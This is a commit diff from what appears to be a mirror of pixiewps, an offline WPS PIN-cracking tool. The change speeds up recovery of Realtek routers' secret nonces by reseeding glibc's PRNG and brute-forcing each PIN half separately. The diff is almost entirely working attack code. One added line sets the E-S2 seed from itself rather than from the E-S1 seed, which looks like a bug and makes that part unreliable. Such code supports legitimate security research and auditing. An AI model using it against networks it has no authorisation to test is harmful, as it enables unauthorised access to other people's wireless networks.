tyler.durden/pixiewps
1
0
Fork 0
mirror of https://github.com/wiire-a/pixiewps.git synced 2025-07-28 00:04:38 +02:00
Code Issues Packages Projects Releases Wiki Activity

find_rtl_es: speed up search by cracking es1 and es2 independently

Browse Source
This commit is contained in:
rofl0r 2017-11-29 19:37:56 +00:00 committed by wiire-a
parent 9d59eda03b
commit 0591369505
1 changed files with 48 additions and 53 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

97
src/pixiewps.c
View File

@ -49,7 +49,10 @@
uint32_t ecos_rand_simplest(uint32_t *seed); uint32_t ecos_rand_simplest(uint32_t *seed);
uint32_t ecos_rand_simple(uint32_t *seed); uint32_t ecos_rand_simple(uint32_t *seed);
uint32_t ecos_rand_knuth(uint32_t *seed); uint32_t ecos_rand_knuth(uint32_t *seed);
uint_fast8_t crack(struct global *g, char *pin);
static int crack_first_half(struct global *wps, char *pin);
static int crack_second_half(struct global *wps, char *pin);
static int crack(struct global *wps, char *pin);
static const char *option_string = "e:r:s:z:a:n:m:b:o:v:j:5:7:SflVh?"; static const char *option_string = "e:r:s:z:a:n:m:b:o:v:j:5:7:SflVh?";
static const struct option long_options[] = { static const struct option long_options[] = {
@ -293,6 +296,20 @@ unsigned int hardware_concurrency()
#endif #endif
} }
static void rtl_nonce_fill(uint8_t *nonce, uint32_t seed)
{
struct glibc_prng glibc_prng;
int i;
uint8_t *ptr = nonce;
glibc_seed(&glibc_prng, seed);
for (i = 0; i < 4; i++, ptr += 4) {
uint32_t be = end_htobe32(glibc_rand(&glibc_prng));
memcpy(ptr, &be, sizeof be);
}
}
static int find_rtl_es_dir(struct global *wps, char *pin, int dir) static int find_rtl_es_dir(struct global *wps, char *pin, int dir)
{ {
uint_fast8_t found_p_mode = NONE; uint_fast8_t found_p_mode = NONE;
@ -308,61 +325,37 @@ static int find_rtl_es_dir(struct global *wps, char *pin, int dir)
else else
DEBUG_PRINT("Trying backwards in time"); DEBUG_PRINT("Trying backwards in time");
do { for (i = 0; i != break_cond; i += dir) {
i += dir; rtl_nonce_fill(wps->e_s1, wps->nonce_seed + i);
glibc_seed(&glibc_prng, wps->nonce_seed + i);
for (uint_fast8_t j = 0; j < 4; j++) {
uint32_t be = end_htobe32(glibc_rand(&glibc_prng));
memcpy(&(wps->e_s1[4 * j]), &be, sizeof(uint32_t));
}
memcpy(wps->e_s2, wps->e_s1, WPS_SECRET_NONCE_LEN); /* E-S1 = E-S2 != E-Nonce */
wps->s1_seed = wps->nonce_seed + i;
wps->s2_seed = wps->nonce_seed + i;
DEBUG_PRINT("Trying (%10u) with E-S1: ", wps->s1_seed); DEBUG_PRINT("Trying (%10u) with E-S1: ", wps->nonce_seed + i);
DEBUG_PRINT_ARRAY(wps->e_s1, WPS_SECRET_NONCE_LEN); DEBUG_PRINT_ARRAY(wps->e_s1, WPS_SECRET_NONCE_LEN);
DEBUG_PRINT("Trying (%10u) with E-S2: ", wps->s2_seed);
DEBUG_PRINT_ARRAY(wps->e_s2, WPS_SECRET_NONCE_LEN);
uint_fast8_t r = crack(wps, pin); if (crack_first_half(wps, pin)) {
if (r == PIN_FOUND) { DEBUG_PRINT("First pin half found");
found_p_mode = RTL819x; wps->s1_seed = wps->nonce_seed + i;
DEBUG_PRINT("Pin found"); char pin_copy[WPS_PIN_LEN + 1];
} strcpy(pin_copy, pin);
else if (r == PIN_ERROR) { int j;
if (i == 1 || i == -1) { /* we assume that the seed used for es2 is within a range of 10 seconds
memcpy(wps->e_s1, wps->e_nonce, WPS_SECRET_NONCE_LEN); /* E-S1 = E-Nonce != E-S2 */ forwards in time only */
memcpy(tmp_s_nonce, wps->e_s2, WPS_SECRET_NONCE_LEN); /* Chaching for next round, see below */ for (j = 0; j < 10; j++) {
} strcpy(pin, pin_copy);
else { rtl_nonce_fill(wps->e_s2, wps->s1_seed + j);
memcpy(wps->e_s1, tmp_s_nonce, WPS_SECRET_NONCE_LEN); DEBUG_PRINT("Trying (%10u) with E-S2: ", wps->s1_seed + j);
memcpy(tmp_s_nonce, wps->e_s2, WPS_SECRET_NONCE_LEN); /* E-S1 = old E-S1, E-S2 = new E-S2 */ DEBUG_PRINT_ARRAY(wps->e_s2, WPS_SECRET_NONCE_LEN);
} if (crack_second_half(wps, pin)) {
if (dir == 1) { wps->s2_seed = wps->s2_seed + j;
wps->s1_seed = wps->nonce_seed + i - dir; DEBUG_PRINT("Pin found");
wps->s2_seed = wps->nonce_seed + i; return RTL819x;
} }
else {
wps->s1_seed = wps->nonce_seed + i;
wps->s2_seed = wps->nonce_seed + i - dir;
}
DEBUG_PRINT("Trying (%10u) with E-S1: ", wps->s1_seed);
DEBUG_PRINT_ARRAY(wps->e_s1, WPS_SECRET_NONCE_LEN);
DEBUG_PRINT("Trying (%10u) with E-S2: ", wps->s2_seed);
DEBUG_PRINT_ARRAY(wps->e_s2, WPS_SECRET_NONCE_LEN);
uint_fast8_t r2 = crack(wps, pin);
if (r2 == PIN_FOUND) {
found_p_mode = RTL819x;
DEBUG_PRINT("Pin found");
} }
} }
} while (found_p_mode == NONE && i != break_cond); }
return NONE;
return found_p_mode;
} }
static int find_rtl_es(struct global *wps, char *pin) static int find_rtl_es(struct global *wps, char *pin)
{ {
@ -1535,15 +1528,17 @@ static int crack_second_half(struct global *wps, char *pin)
} }
uint_to_char_array(second_half, 4, s_pin); uint_to_char_array(second_half, 4, s_pin);
if (check_pin_half(s_pin, wps->psk2, wps->e_s2, wps, wps->e_hash2)) if (check_pin_half(s_pin, wps->psk2, wps->e_s2, wps, wps->e_hash2)) {
pin[8] = 0; /* make sure pin string is zero-terminated */
return 1; return 1;
}
} }
return 0; return 0;
} }
/* PIN cracking attempt - returns 0 for success, 1 for failure */ /* PIN cracking attempt - returns 0 for success, 1 for failure */
uint_fast8_t crack(struct global *wps, char *pin) static int crack(struct global *wps, char *pin)
{ {
return !(crack_first_half(wps, pin) && crack_second_half(wps, pin)); return !(crack_first_half(wps, pin) && crack_second_half(wps, pin));